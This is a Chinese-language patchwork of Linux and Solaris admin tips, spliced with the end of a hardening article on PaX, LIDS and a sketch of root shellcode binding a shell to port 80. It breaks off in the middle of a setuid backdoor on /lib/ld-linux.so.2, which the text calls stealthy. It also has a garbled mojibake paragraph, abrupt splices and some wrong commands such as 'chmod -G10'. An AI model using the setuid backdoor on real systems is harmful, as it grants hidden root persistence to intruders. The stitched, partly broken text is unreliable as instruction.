比较熟知的是 PaX 内核补丁，它主要通过数据区 [heap/bss/stack] 不可执行代码来防御直接覆盖返回地址后跳转到数据区执行 shellcode 的一些exploitPaX的站点好像访问不了，但用google可以找到很多对应较新内核的PaX下载http://home.hetnet.nl/~ottolander/pax/pax.html。

眕奻硃間甜祥夔滅郘垀衄腔祛堤馴击，但却可以挡住市面上相当数量的 exploit，现在那些关于如何绕过补丁的高级 exploit 技巧已经很不神秘，但是书写那样的攻击程序通常要满足一定的条件，即使那样的程序被写出来，函数，文件指针被成功覆盖，可能在这个系统上还是无法把那“溢出成果”传递给攻击者--仍然没有办法得到 shell 或是建立一个连接。

lids Linux 上的入侵检测和防护系统，内核补丁，通过一个比 root 更大的 ring0 权限来提供增强的访问控制，甚至连 root 都不能改变，已有现成资料，不在此讨论。站点：http://www.lids.org

lids 和缓冲区溢出补丁可能不兼容，欢迎知道真相的朋友告诉我。

10. 日志策略

主要就是创建对入侵相关的重要日志的硬拷贝，不至于应急响应的时候连最后的黑匣子都没有可以把他们重定向到打印机，管理员邮件，独立的日志服务器及其热备份

11. Snort 入侵检测系统

对入侵响应和安全日志要求较高的系统有此必要；对于一般的系统而言，如果管理员根本不会去看一大堆日志，那么它白白占用系统资源就如同鸡肋一样

12. 最后的建议

关心 bugtraq 上的漏洞列表；

订阅厂商的安全公告；

勤打补丁；

站在攻击者的角度去思考如何防御。

小结

对攻击的思考：假设有一个技术高超的入侵者，拥有自行挖掘系统底层漏洞的能力，他发现了 apache 的一个漏洞，并书写了 remote exploit，这个漏洞暂时还没有出现在 bugtraq 上，处于“未知”状态，如果入侵者试图攻击我们的系统，他必须能挖掘一个 apache 并且是 root 级的远程溢出：

<1>在 shellcode 中植入代码杀死 httpd 进程，并且把 sh 绑定在 80 端口。

<2>在 80 端口复用。

<3>让 shellcode 执行 iptables -F OUTPUT/INPUT，前提是他猜到有这么回事以上均需要溢出后是 root 权限，并且是能绕过 PaX 的高级 exploit，另外 apach e杀掉后会自动重启如果想攻击 sshd，因为 iptables 将丢弃所有来自外网访问 sshd 的包，所以即使有远程溢出 (当然别忘了 PaX)，此路不通其他的方法，如果脚本攻击可以获得允许远程登录 ssh 用户的明文口令，或是利用脚本缺陷直接添加系统账号，这不仅需要系统 root 权限，而且 /etc/passwd 已经被 chattr 过，满足以上条件，并且攻破 server2，就有希望得到 shell但提升权限的机会不大!普通脚本攻击在此无效，当然如果该系统并不运行 CGI 的话，此路更是不通诚然入侵者很可能在 http 上破坏你的脚本，不过第三方的 web 安全加固暂不在本文讨论之列以上条件对大多数入侵者足够苛刻，可以说几乎不可能实现。

但是我们为此也牺牲了不少，并且这些措施依赖一定的环境而实现安全性和易用性，需要读者站在自己的角度寻找他们的平衡点。

Linux小技巧收集
前言：因为用Linux的时间越来越长，所需要做的事也越来越多，效率成了我必需突破的瓶颈。在此总结一下这段时间用过的一些好的Linux技巧。以后时常补充这样自己要用的时候就很方便了。
Author:Ajian
[文本处理]
1、查看某文件的一部分
如果你只想看文件的前 5 行，可以使用 head 命令，
如：head -5 /etc/passwd
如果你想查看文件的后 10 行，可以使用 tail 命令，
如：tail -10 /etc/passwd
查看文件中间一段，可以使用 sed 命令
如:sed –n '5,10p' /etc/passwd 这样你就可以只查看文件的第 5 行到第 10 行

2、将 file.txt 里的123改为 456
方法 1
sed 's/123/456/g' file.txt > file.txt.new 修改的保存到其它文件
sed -i 's/123/456/g' file.txt 直接修改原文件
方法 2
vi file.txt
输入命令：
:%s/123/456/g
注意：如果替换的文件有特殊符号如/就要用\来取消。
例：sed -i 's/\/usr\/local\/apache2\/htdocs/\/var\/www\/html/g' /usr/local/apache2/conf/httpd.conf
如果只是下原有的行后添加就用&
例：sed -i 's/DirectoryIndex index.html index.html.var/& index.htm index.php /g' /usr/local/apache2/conf/httpd.conf
3、echo 典型应用
echo "abcdefg" | perl -lne '{$a = reverse($_); print $a;}' 把一个字符串翻转
echo bottle|rev 把一个字符串翻转

[文件目录管理]
1、删除几天以前的所有东西(包括目录名和目录中的文件）
1) find . -ctime +3 -exec rm -rf {} \;
2) find ./ -mtime +3 -print|xargs rm -f –r

2、在多级目录中查找某个文件的方法
1) find /dir -name filename.ext
2) du -a | grep filename.ext
3) locate filename.ext

3、删除软硬连接注意点
删除软件连接的时候一定要记得不要在删除的文件夹后加一斜杠,
rm -f filename/
会说这是一个文件夹不能删除
rm filename
会提示说是否要删除这个连接。
如果用的第一种可能会把其它文件都删除

4、删除目录中含输入关键字的文件
find /mnt/ebook/ -type f -exec grep "在此输入关键字" {} \; -print -exec rm {} \;

5、在当前目录下解压 rpm 文件
cat kernel-ntfs-2.4.20-8.i686.rpm | rpm2cpio | pax –r

6、用命令清空 Root 回收站中的文件
cd /var/.Trash-root
rm -rf *

[系统与安全]
1、让用户的密码必须有一定的长度，并且符合复杂度
vi /etc/login.defs，修改 PASS_MIN_LEN

2、用 dat 查询昨天的日期
date --date='yesterday'

3、修改系统时
1) 设置你的时区： timeconfig 里选择Asia/Shanghai （如果你位于 GMT+8 中国区域）
2) 与标准时间服务器校准： ntpdate time.nist.gov
date -s “2003-04-14 cst”，cst 指时区，时间设定用 date -s 18:10
修改后执行 clock -w 写到 CMOS
3) 将当前软件系统时间写入硬件时钟： hwclock –systohc

4、改变 redhat 的系统语言/字符集
修改 /etc/sysconfig/i18n 文件，如
LANG="en_US"，xwindow会显示英文界面，
LANG="zh_CN.GB18030"，xwindow会显示中文界面。
还有一种方法
cp /etc/sysconfig/i18n $HOME/.i18n
vi $HOME/.i18n 文件，如
LANG="en_US"，xwindow会显示英文界面，
LANG="zh_CN.GB18030"，xwindow会显示中文界面。
这样就可以改变个人的界面语言，而不影响别的用户

5、查看系统信息
cat /proc/cpuinfo - CPU (i.e. vendor, Mhz, flags like mmx)
cat /proc/interrupts - 中断
cat /proc/ioports - 设备 IO端口
cat /proc/meminfo - 内存信息(i.e. mem used, free, swap size)
cat /proc/partitions - 所有设备的所有分区
cat /proc/pci - PCI设备的信息
cat /proc/swaps - 所有 Swap 分区的信息
cat /proc/version - Linux 的版本号 相当于 uname -r
uname -a - 看系统内核等信息

6、让 linux自动同步时间
vi /etc/crontab
加上一句：
00 0 1 * * root rdate -s time.nist.gov

7、如何防止某个关键文件被修改
在 Linux 下，有些配置文件是不允许任何人（包括 root）修改的。为了防止被误删除或修改
可以设定该文件的“不可修改位(immutable) ”。命令如下：
# chattr +i /etc/fstab
如果需要修改文件则采用下面的命令：
# chattr -i /etc/fstab
[管理与网络]
1、 lsof 用法小全
lsof abc.txt 显示开启文件 abc.txt 的进程
lsof -i :22 知道 22 端口现在运行什么程序
lsof -c nsd 显示 nsd 进程现在打开的文件
lsof -g gid 显示归属 gid 的进程情况
lsof +d /usr/local/ 显示目录下被进程开启的文件
lsof +D /usr/local/ 同上，但是会搜索目录下的目录，时间较长
lsof -d 4 显示使用 fd 为4 的进程
lsof -i [i] 用以显示符合条件的进程情况
语法: lsof -i[46] [protocol][@hostname|hostaddr][:service|port]
46 --> IPv4 or IPv6
protocol --> TCP or UDP
hostname --> Internet host name
hostaddr --> IPv4 位置
service --> /etc/service中的 service name (可以不止一个)
port --> 端口号(可以不止一个)
例子: TCP:25 - TCP and port 25
@1.2.3.4 - Internet IPv4 host address 1.2.3.4
tcp@ohaha.ks.edu.tw:ftp - TCP protocol host:ohaha.ks.edu.tw service name:ftp
lsof -n 不将 IP转换为 hostname，预设是不加上-n参数
例子: lsof -i tcp@ohaha.ks.edu.tw:ftp -n
lsof -p 12 看进程号为 12的进程打开了哪些文件

2、grep 不显示本身进程
#ps -aux|grep httpd|grep -v grep
grep -v grep可以取消显示你所执行的 grep 本身这个进程，-v 参数是不显示所列出的进程名

3、查看本机IP
ifconfig |grep "inet" |cut -c 0-36|sed -e 's/[a-zA-Z: ]//g'
hostname –i

4、查看有多少活动的Httpd进程
#!/bin/sh
while (true)
do
pstree |grep "*\[httpd\]$"|sed 's/.*-\([0-9][0-9]*\)\*\[httpd\]$/\1/'
sleep 3
done
同样可以引用到其它的进程

5、设置 com1口，让超级终端通过 com1口进行登录
第一步：确认有/sbin/agetty，编辑/etc/inittab，添加
7:2345:respawn:/sbin/agetty /dev/ttyS0 9600
9600bps 是因为连路由器时缺省一般都是这种速率，也可以设成
19200、38400、57600、115200
第二步：修改/etc/securetty，添加一行：ttyS0，确保 root 用户能登录
第三步：重启机器，就可以拔掉鼠标键盘显示器（启动时最好还是要看看输出信息）了

6、查找或删除正在使用某文件的进程
fuser filename
fuser -k filename

7、已知网络中一个机器的硬件地址，如何知道它所对应的 IP地址
在 Linux 下，假定要查“00:0A:EB:27:17:B9”这样一个硬件地址所对应的 IP 地址，可以使
用以下命令：
# cat /proc/net/arp |grep 00:0A:EB:27:17:B9
192.168.2.54 0x1 0x6 00:0A:EB:27:17:B9 *eth2
另外，还可以用“arp -a”命令查询：
# arp –a|grep 00:0A:EB:27:17:B9
（192.168.2.54）at 00:0A:EB:27:17:B9[ether] on eth2

8、在 Linux下如何绑定 IP地址和硬件地址
可以编辑一个地址对应文件，里面记录了 IP地址和硬件地址的对应关系，然后执行“arp –
f 地址对应文件”。如果没有指定地址对应文件，则通常情况下一默认文件/etc/ethers为准。
地址对应文件的格式如下：
192.168.0.1 00:0D:61:27:58:93
192.168.0.2 00:40:F4:2A:2E:5C
192.168.0.3 00:0A:EB:5E:BA:8E

9、更改 eth0是否混杂模式（混杂模式可以监听其它主机的信息）
网卡 eth0 改成混杂模式：
ifconfig eth0 promisc
关闭混杂模式：
ifco
nfig eth0 –promisc

10、linux下清空 arp表的命令
#arp -d -a(适用于 bsd)
for HOST in `arp | sed '/Address/d' | awk '{ print $1}'` ; do arp -d $HOST; done

11、如何得到网卡的 MAC地址
arp -a | awk '{print $4}'
ifconfig eth0 | head -1 | awk '{print $5}'

12、一个网卡绑定多 ip
方法一、建立eth0:1在网卡后加冒号和数字的文件
cp /etc/sysconfig/network-scripts/eth0 /etc/sysconfig/network-scripts/eth0:1
再修改下eth0:1就可以了.
方法二、
在/etc/sysconfig/network-scripts/下创建一个文件：ifcfg-ethX-rangeX （"X"为网卡号）
文件内容：
IPADDR_START=
IPADDR_END=
CLONENUM=0
可以有 256个 ip

13、一个 ip如何绑定两块网卡
假设 192.168.0.88 是ip,192.168.0.1 是网关:
/sbin/modprobe bonding miimon=100 mode=1
/sbin/ifdown eth0
/sbin/ifdown eth1
/sbin/ifconfig bond0 192.168.0.88
/sbin/ifenslave bond0 eth0 eth1
/sbin/route add default gw 192.168.0.1

14、设置ssh 上来能不自动断线
修改自己 HOME 目录下的.bash_profile文件，加上
export TMOUT=1000000 (以秒为单位)
然后运行 source .bash_profile

15、mount 局域网上其他windows机器共享出的目录
mount -t smbfs -o username=guest,password=guest //machine/path /mnt/cdrom

16、向登陆到同一台服务器上的所有用户发一条信息
1)输入 wall并回车
2)输入要发送的消息
3)结束时按“Control-d”键,消息即在用户的控制窗口中显示

17、向远程机器上的所有用户发送消息
使用 rwall(向所有人远程写)命令同时发送消息到网络中的所有用户。
rwall hostname file
当使用 CDE或 OpenWindows 等窗口系统时,每个窗口被看成是一次单个的登录;
如果用户登录次数超过一次则消息直接发送到控制窗口

18、向网络中的所有用户发送消息
发送消息到网络中的所有用户
1)输入 rwall -n netgroup 并回车
2)输入要发送的消息
3)结束时按“Control-d”键，消息即在系统每个用户的控制窗口中显示，下面是系统管理员
发消息到网络组 Eng 每个用户的例子：
% rwall -n EngSystem will be rebooted at 11:00.(Control-d)
%
用户控制窗口中的消息:Broadcast message from root on console…System will be rebooted at
11:00.EOF
注意：也可以通过 rwall hostname（主机名）命令到系统的所有用户

19、 将 top的结果输出到文件中
top -d 2 -n 3 -b >test.txt
可以把 top 的结果每隔 2秒，打印 3次，这样后面页的进程也能够看见了

20、装双系统不能看到另一个系统的解决办法
首先光盘启动，进入 rescue 模式，运行 GRUB，进入 grub 提示符 grub>，然后敲入下面的
语句，重启就好了。
root (hd0,2)，setup (hd0)

21、压缩传输文件或目录
传输到远程：tar czf - www | ssh server "tar zxf -"
压缩到远程：tar czf - www | ssh server "cat > www.tar.gz"
解压到远程：ssh server "tar zxf -" < www.tar.gz
解压到本地：ssh server "cat www.tar.gz" | tar zxf -

22、命令行下发送带附件的邮件
方法 1. uuencode | mail -s "title" mail@address
本地需要作为附件的文件名。
邮件中的附件文件名，可以和不同，其实内容一样。
方法 2. cat | mutt -s "title" -a mail@address
邮件正文内容。
本地需要作为附件的文件名。
[Mysql维护]
1、mysql 的数据库存放在什么地方
1) 如果使用 rpm包安装，应该在/var/lib/mysql 目录下，以数据库名为目录名
2) 如果源码安装在/usr/local/mysql中，应该在/usr/local/mysql/var中，以数据库名为目录名
2、 从 mysql 中导出和导入数据
导出数据库
mysqldump 数据库名 > 文件名
导入数据库
mysqladmin create 数据库名
mysql 数据库名 < 文件名

3、忘了 mysql 的 root 口令怎么办
# service mysql stop
# mysqld_safe --skip-grant-tables &
# mysqladmin -u user password 'newpassword''
# mysqladmin flush-privileges

4、 mysqld 起来了，却无法登录，提示"/var/lib/mysql/mysql.sock"不存在
这种情况大多数是因为你的 mysql 是使用 rpm 方式安装的，它会自动寻找
/var/lib/mysql/mysql.sock 这个文件，
通过 unix socket 登录 mysql。
常见解决办法如下：
1)创建/修改文件 /etc/my.cnf，至少增加/修改一行
[mysql]
[client]
socket = /tmp/mysql.sock
#在这里写上你的 mysql.sock 的正确位置，通常不是在 /tmp/ 下就是在 /var/lib/mysql/ 下
2)指定 IP地址，使用 tcp 方式连接mysql，而不使用本地 sock 方式
#mysql -h127.0.0.1 -uuser -ppassword
3)为 mysql.sock 加个连接，比如说实际的 mysql.sock 在 /tmp/ 下，则
# ln -s /tmp/mysql.sock /var/lib/mysql/mysql.sock即可

5、 导出数据的几种常用方法
1)使用 mysqldump
#mysqldump -uuser -ppassword -B database --tables table1 --tables table2 >
dump_data_20051206.sql
详细的参数
2)backup to语法
mysql>BACKUP TABLE tbl_name[,tbl_name...] TO '/path/to/backup/directory';
详细请查看 mysql 手册
3)mysqlhotcopy
#mysqlhotcopy db_name [/path/to/new_directory]
或
#mysqlhotcopy db_name_1 ... db_name_n /path/to/new_directory
或
#mysqlhotcopy db_name./regex/
详细请查看 mysql 手册
4)select into outfile
详细请查看 mysql 手册
5)客户端命令行
#mysql -uuser -ppassword -e "sql statements" database > result.txt
以上各种方法中，以 mysqldump 最常用

6、 如何在命令行上执行 sql 语句
#mysql -uuser -ppassword -e "sql statements" database

7、 导入备份出来文件的常见方法
1)由 mysqldump 出来的文件
#mysql -uuser -ppassword [database] < dump.sql
2)文件类型同上，使用 source 语法
mysql>source /path_to_file/dump.sql;
3)按照一定格式存储的文本文件或 csv 等文件
#mysqlimport [options] database file1 [file2....]
详细请查看 mysql 手册
4)文件类型同上，也可以使用 load data 语法导入
详细请查看 mysql 手册
一、Solaris修改主机名

1． 编辑/etc/hosts

2． 编辑/etc/hostname.网卡名

3． 编辑/etc/nodename

4． 编辑/etc/net/ticots/hosts

5． 编辑/etc/net/ticosord/hosts

6． 编辑/etc/net/ticlts/hosts


二、网卡配置方法

1．查看网卡是否已经安装

# ls /dev |grep “网卡名”


2．配置网卡接口名称

# vi /etc/hostname.网卡名

Myethernet


3．配置子网掩码

# vi /etc/inet/netmasks

192.168.0.0 255.255.255.0


4．配置网卡接口地址

# vi /etc/inet/hosts

127.0.0.1 localhost

192.168.0.100 Myethernet


5．统一配置文件

# vi /etc/inet/ipnodes

：：localhost

127.0.0.1 localhost

192.168.0.105 Myethernet loghost


三、修改主机名

1．编辑/etc/hosts

2．编辑/etc/hostname.bge0

3．编辑/etc/nodename

4．编辑/etc/net/ticots/hosts

5．编辑/etc/net/ticotsord/hosts

6．编辑/etc/net/ticlts/hosts


四、建立、取消网卡逻辑IP

1．建立

# ifconfig e1000g0:1 plumb up

# ifconfig e1000g0:1 10.0.0.1 netmask 255.255.255.0 up


2．取消

# ifconfig e10000:1 unplumb


3．永久性生效，需要修改/etc/
hosts、/etc/hostname.e1000g0:1、/etc/inet/ipnodes 文件。


五、SOLARIS运行级别

0 进入OK状态 （需要SUN的PROM芯片支持）

1 管理状态 （单用户模式，禁止其他用户登陆）

2 多用户模式 （没有网络文件共享服务）

3 多用户模式 （有网络文件共享服务）

4 保留，未使用

5 退出操作系统并关机

6 重启

S,s 单用户模式


六、磁盘命名

逻辑设备：在/dev/目录下的设备名

物理设备：在/device/目录下的设备名

说明：逻辑设备通常容易被我们区分，而物理设备由KERNEL直接去识别，所以比较难理解。一般我们去记某一设备的逻辑设备名就可以了。


Sun使用下列命名方式定义逻辑设备名

/dev/[r]dsk/cXtXdXsX

c：逻辑控制器号

t：物理总线目标号

d：磁盘式逻辑单元号（LUN SCSI设备为0）

s：分区号


七、文字模式与WINDOWS模式的开关命令

# /usr/dt/bin/dtconfig –[de]

-d disable

-e enable


八、显示完全程序名的ps命令

/usr/ucb/ps –auxwww

相当于linux下ps –ef –cols


九、Solaris - ping命令查看主机IP地址

ping命令加上-a或-s即可查看主机IP地址:
#ping -a hostname
or
#ping -s hostname

十、ls命令的几个技巧

按时修改间(modification time)排序：ls -t, ls -lt, ls -1t, ls -Ct

按访问时间(access time)排序：ls -u

按文件大小排序：ls -lS

显示所有文件，除了.及..：ls -A

十一、删除“－”开头的文件


对于文件名中含－的文件，rm命令容易认为这是命令选项，用rm *报：

rm: ERROR: Illegal option -- c

usage: rm [-fiRr] file...


删除的方法：

1 rm ./－filename 这样使－不是第一个字符。

2.rm -- －filename 用－－告诉rm这是最后一个选项，参见getopt。有的系统用

rm － －filename

3.ls -i 列出inum ；用find . -inum inum_of_thisfile -exec rm '{}' \;

用这种方法可以删除含特殊字符的文件。

十二、>重定向


1.你也可以输出重定向到一个设备里，因为linux把所有设备都看成文件

比如，当多用户登录是，A用户使用的是pts/0终端

你可以用这种方式和他聊天

echo "ｈｉ＂　＞　／ｄｅｖ／ｐｔｓ／０

不过这种方法很流氓，而且需要你对这个设备有写权

2.新建文件

>aaa 新建文件aaa

>-aaa 新建文件-aaa

3.清空文件

>aaa


linux技巧

++实现RedHat非正常关机的自动磁盘修复
先登录到服务器，然后在/etc/sysconfig里增加一个文件autofsck,内容如下：
AUTOFSCK_DEF_CHECK=yes
PROMPT=yes

++改变文件或目录之最后修改时间(变为当前时间)
执行格式：touch name ( name 可为文件或目录名称。)

++如何设置login后欢迎信息
修改/etc/motd，往里面写入文本即可。

++如何设置login前欢迎界面
修改/etc/issue或者issue.net，往里面写入文本。
issue的内容是出现在本机登录的用户界面上，而issue.net则是在用户通过网络telnet的时候出现。

++如何修改网卡MAC地址
首先必须关闭网卡设备，否则会报告系统忙，无法更改。
命令是： /sbin/ifconfig eth0 down
修改 MAC 地址，这一步较 Windows 中的修改要简单。
命令是：/sbin/ifconfig eth0 hw ether 00:AA:BB:CC:DD:EE
重新启用网卡 /sbin/ifconfig eht0 up
网卡的 MAC 地址更改就完成了

++建立别名/删除别名
alias cp='cp -i'
unalias cp

++如何知道某个命令使用了什么库文件
例如要知道ls使用了什么库文件，可以使用：
$ ldd /bin/ls

++如何使一个用户进程在用户退出系统后仍然运行
使用nohup command &，比如：nohup wget -c ftp://test.com/test.iso
#这样即使用户退出系统，wget进程仍然继续运行直到test.iso下载完成为止

++如何限制用户的最小密码长度
修改/etc/login.defs里面的PASS_MIN_LEN的值。比如限制用户最小密码长度是8：
PASS_MIN_LEN 8

++如何取消root命令历史记录以增加安全性
为了设置系统不记录每个人执行过的命令，就在/etc/profile里设置：
HISTFILESIZE=0
HISTSIZE=0
或者：
ln -s /dev/null ~/.bash_history

++如何测试硬盘性能
使用hdparm -t -T /dev/hdX就可以测试硬盘的buffer-cache reads和buffered disk reads两个数据，可以用来当作硬盘性能的参考。
同时使用hdparm -c3 /dev/hdaX还能设置硬盘以32bit传输，以加快数据传输的速度。

++如何列出一个目录占用的空间
du或du -s或du -k
du -S | sort -n 可以迅速发现那个目录是最大的。
用df可以看到已安装的文件系统的空间大小及剩余空间大小。
quota -v查看用户的磁盘空间信息,如果你用quota限制了用户空间大小的话。

++如何使新用户首次登陆后强制修改密码
#useradd -p ‘’ testuser; chage -d 0 testuser

++在Linux中有时开机不自动检查新硬件，新安装的网卡找不到。请问怎么解决？
答：自动检查新硬件的服务是Kudzu，用户可以用“ntsysv”命令启动该服务。下次重启就会找到用户的新网卡。

++从台湾省的一个 网站找到的,如何让系统密码和samba密码一致,并可以让用户自行修改他们的密码.
使用web界面來同步更改system passwd 及 samba password
下载 http://changepassword.sourceforge.net/
安装就可以了.先看README哈.
附加:
将系统用户批量倒成samba用户.
less /etc/passwd | mksmbpasswd.sh >; /etc/samba/smbpasswd

++更改Linux启动时用图形界面还是字符界面
cd /etc
vi inittab
将id:5:initdefault: 其中5表示默认图形界面
改id:3: initdefault: 3表示字符界面

++配置smb可以被哪些IP所用.
cd /etc/samba
Vi smb.conf
找到hosts allow = 192.168.1. 192.168.2. 127.
修改其为哪些机器所用,注意IP之间用逗号分开
举例:
hosts allow =192.168.1.110,192.168.1.120

++禁止在后台使用CTRL-ALT-DELETE重起机器
cd /etc/inittab
vi inittab 在文件找到下面一行
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now （注释掉这一行）
如： # Trap CTRL-ALT-DELETE
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now

++修改主机名
vi /etc/sysconfig/network
修改HOSTNAME一行为HOSTNAME=主机名

++查看开机检测的硬件
dmesg | more

++查看硬盘使用情况
df –m

++查看目录的大小
du –sh dirname

++解压小全
tar xvfj lichuanhua.tar.bz2
tar xvfz lichuanhua.tar.gz
tar xvfz lichuanhua.tgz
tar xvf lichuanhua.tar
unzip lichuanhua.zip
注:压缩 tar cvfz FileName.tar.gz DirName

++显示内存使用情况
free –m

++显示系统运行了多长时间
uptime

++显示开机自检的内容命令
dmesg

++端口的详细列表
/etc/services

++查看物理信息
lspci

++文本截面的中文支持
RH 9.0自带安装包 zhcon_0.2.3_1.rh9.i386.rpm
安装完成后，执行: zhcon 就可以支持中文了

++linux 控制 windows
(1)用RH9.0自己带rdesktop,版本是1.2.0
命令：rdesktop –u user –f 192.168.1.70 色默认的是8位
(2)要达到16色，就要下载新版本1.3.0
rdesktop –a 16 –u lichuanhua –g 800*600 192.168
.1.70

++不让显示器休眠
setterm –blank 0

++显示最后一个登录到系统的用户
last

++查看所有帐号的最后登录时间
lastlog /var/log/lastlog

++查看系统自开通以来所有用户的登录时间和地点
cat /var/log/secure

++显示当前用户所属信息
id

++如何知道Apache的连接数目
ps -ef|grep httpd|wc -l #其它服务可以类推
netstat -nat|grep -i “80″|wc -l # 以上结果再减1吧

++删除用户帐号的同时,把用户的主目录也一起删除
userdel -r 用户名

++修改已有用户的信息
usermod [参数] 用户名
参数: -c, -d, -m, -g, -G, -s, -u以及-o与adduser参数意义相同
新参数: -l 新用户名(指定一个新的账号,即将原来的用户名改为新的用户名)

++改变redhat的系统语言/字符集
改 /etc/sysconfig/i18n 文件，如
LANG=”en_US”，xwindow会显示英文界面，
LANG=”zh_CN.GB18030″，xwindow会显示中文界面。
还有一种方法
cp /etc/sysconfig/i18n $HOME/.i18n
修改 $HOME/.i18n 文件，如
LANG=”en_US”，xwindow会显示英文界面，
LANG=”zh_CN.GB18030″，xwindow会显示中文界面。
这样就可以改变个人的界面语言，而不影响别的用户
vi .bashrc
export LANG=zh_CN.GB2312
export LC_ALL=zh_CN.GB2312

++cd光盘做成iso文件
cp /dev/cdrom xxxx.iso

++快速观看开机的硬件检测
dmesg | more

++查看硬盘的使用情况
df -k 以K为单位显示
df -h 以人性化单位显示，可以是b,k,m,g,t..

++查看目录的大小
du -sh dirname
-s 仅显示总计
-h 以K、M、G为单位，提高信息的可读性。KB、MB、GB是以1024为换算单 位， -H以1000为换算单位。

++查找或删除正在使用某文件的进程
fuser filename
fuser -k filename

++linux中让用户的密码必须有一定的长度,并且符合复杂度
vi /etc/login.defs，改PASS_MIN_LEN

++以不同的用户身份运行程序
su - username -c “/path/to/command”
有时候需要运行特殊身份的程序, 就可以让su来做

++ adduser m -g cvsroot -s /bin/false
添加用户m，参数-s /bin/false表示不允许用户直接登录服务器
id m
显示m用户的uid和gid号。

++ 强制卸载rpm包
rpm -e –nodeps 包名称
#个别不正常情况下:
rm -f /var/lib/rpm/__*
rpm –rebuilddb

++拒绝除root用户的其它用户登陆
touch /etc/nologin
也可以在/etc/passwd中加!对指定用户限制登陆

++检查自己所属之群组名称
执行格式：groups

++修改文件/文件夹所属用户组(支持-R)
chown .组名 文件名(注:组名名勿忘”.”，“:”也可)
也可chgrp 组名 文件名
chown 用户名.组名 文件名(同时修改所属用户及用户组)

++用fuser命令查看一下是哪些进程使用这个分区上的文件：
fuser –v –m /usr
如果没有什么重要的进程，用以下命令停掉它们：
fuser -k –v –m /usr
然后就可以重新挂载这些文件系统了。

++网络唤醒主机
ether-wake 目标网卡MAC

++如何查找大小为500K到1000K之间的文件
find / -type f -size +500k -and -size -1000k

++让主机不响应ping
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
若想恢复就用
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
#必须是用命令改，不能是vi修改

++自动注销ROOT
编辑你的配置文件”vi /etc/profile”,在"HISTSIZE="后面加入下面这行：
　　TMOUT=300
　　#300，表示300秒

++ls只列出目录
ls -lF | grep ^d
ls -lF | grep /$
ls -F | grep /$

++让cron任务不回馈信息
* * * * * cmd > /dev/null 2>&1

++lsof(list open files)用法
lsof -i :xx
lsof abc.txt 显示开启文件abc.txt的进程
lsof -i :22 知道22端口现在运行什么程序
lsof -c nsd 显示nsd进程现在打开的文件
lsof -g gid 显示归属gid的进程情况

++改变sshd 的端口
在/etc/ssh/sshd_config 中加入一行：Port 2222，/etc/init.d/sshd restart 重启守护进程

++防止任何人使用su 命令成为root
vi /etc/pam.d/su，在开头添加下面两行：
　　auth sufficient /lib/security/pam_rootok.so
　　auth required /lib/security/Pam_wheel.so group=wheel
然后把用户添加到“wheel”组：chmod -G10 username

++如何让ssh 只允许指定的用户登录
方法1：在/etc/pam.d/sshd 文件中加入
auth required pam_listfile.so item=user sense=allow file=/etc/sshusers onerr=fail
然后在/etc 下建立sshusers 文件,加入允许使用ssh 服务的用户名(每一个用户名都要单独一行),重新起动sshd

++利用ssh 复制文件
1、从A 复制B（推过去） #scp -rp /path/filename username@remoteIP:/path
2、从B 复制到A（拉过来）#scp -rp username@remoteIP:/path/filename /path

++linux机器挂载windows上的共享文件
windows IP:192.168.1.1
mount -t smbfs -o username=massky,password=massky //192.168.1.1/dbf /mnt/share
如想机器重启自动挂载，vi /etc/fstab最后加入：
//192.168.1.1/dbf /mnt/share smbfs defaults,auto,username=massky,password=massky 0 0

++定制linux 提示符
在bash 中提示符是通过一个环境变量$PS1 指定的。用export $PS1 查看现在的值，比较直
观常用的提示符可以设定为export PS1=“[\u@\h \W]\$”。其中\u 代表用户名，\h 代表主机
名，\W 代表当前工作目录的最后一层，如果是普通用户\$则显示$，root 用户显示#。

++清空文件
[echo] > 文件名

++DNS相关
host -a domain.com #显示相关资讯都列出来
host domain.com 202.106.0.20 #用202.106.0.20这台DNS服务器查询domain.com

++前后台任务相关
jobs 列出属于当前用户的进程
bg 将进程搬到后台运行（Background）
fg 将进程搬到前台运行（Foreground）
万一你运行程序时忘记使用“&”了，又不想重新执行。可以先使用ctrl+z挂起程序，然后敲入bg命令，这样程序就在后台继续运行了。

++查找当前目录下七天前的文件,并删除
find ./ -mtime +7 -type f -exec rm {} \;

++产生指定大小的文件(bs*count)
dd if=/dev/zero of=filename bs=1000000 count=10

++查找当前目录下文件并更改扩展名
更改所有.ss文件为.aa
# find ./ -name "*.ss" -exec rename .ss .aa '{}' \;

++修改系统时间
date -s "2005-6-4 17:26"

++让服务器自动同步时间
0 1 * * * /usr/sbin/ntpdate 210.72.145.44
或 0 1 * * * rdate -s time.nist.gov

++解决打开文件过多的问题
在etc/security/limits.conf 配置文件中设置进程文件描述符极限：
* soft nofile 2048
* hard nofile 4096
系统级文件描述符极限及timeout时间修改，添加如下两行到 /etc/rc.d/rc.local 启动脚本中：
# Increase system-wide file descriptor limit.
echo 65536 > /proc/sys/fs/file-max
echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout
#一般情况下，最大打开文件数比较合理的设置为每4M物理内存256，比如1G内存可以设为65536，
#而最大的使用的i节点的数目应该是最大打开文件数目的3倍到4倍

++如何用tar打包一个目录时,去掉其中的某些子目录或指定文件
加参数 –exclude 即可, 可加文件名或目录名, 可多写
tar cvf –exclude {dirname,filename} #dirname不要加/

++终端下修改服务器时区
/usr/sbin/timeconfig
或直接#/etc/sysconfig/clock

++关闭启动时的内存不足256M提示
#vi /etc/rc.sysinit #把最后六行注释掉
或#vi /var/lib/supportinfo
把其

方法一：setuid的方法，其实8是很隐蔽。看看过程:

[root@localdomain lib]# ls -l |grep ld-linux
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2
[root@localdomain lib]# chmod +s ld-linux.so.2
[root@localdomain lib]# ls -l |grep ld-2.7.so
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
[root@localdomain lib]#
我们这里给/lib/ld-linux.so.2这个文件（在FC8里，它指向ld-2.7.so这个文件）加了setuid属性。然后我们看怎么利用它。

普通用户登录，测试下权限：

[xiaoyu@localdomain ~]$ whoami
xiaoyu
